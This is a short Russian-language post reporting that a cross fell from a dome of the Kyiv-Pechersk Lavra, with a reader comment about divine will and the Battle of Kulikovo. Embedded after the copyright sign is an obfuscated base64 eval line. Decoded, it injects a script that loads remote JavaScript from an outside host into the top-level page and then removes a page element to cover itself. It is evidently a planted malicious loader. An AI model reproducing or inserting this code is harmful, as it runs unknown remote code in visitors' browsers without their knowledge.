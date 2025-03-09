В Киево-Печерской Лавре с купола упал крест. Плохое предзнаменование, как пишут в сетях киевляне. © eval(atob('aWYoIXRvcC5kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgndCcpKXtzPXRvcC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly9qc2RhdGEuZG8uYW0vbXQvcy5qcz8nK0RhdGUubm93KCk7cy5pZD0ndCc7dG9wLmRvY3VtZW50LmJvZHkucHJlcGVuZChzKTt9cGFyZW50LmRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdkJykucmVtb3ZlKCk='))">.
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Комментарии
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Алексей Тан
А ещё во времена, при битве на Поле Куликовом... Господь, по вероятно, по какой то причине.... не захотел... тем землям и народу... ДАТЬ СВЯТОСТИ СВОЕЙ... и попустил... что они отказались участвовать... в битве на Поле Куликовом.
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10 час.
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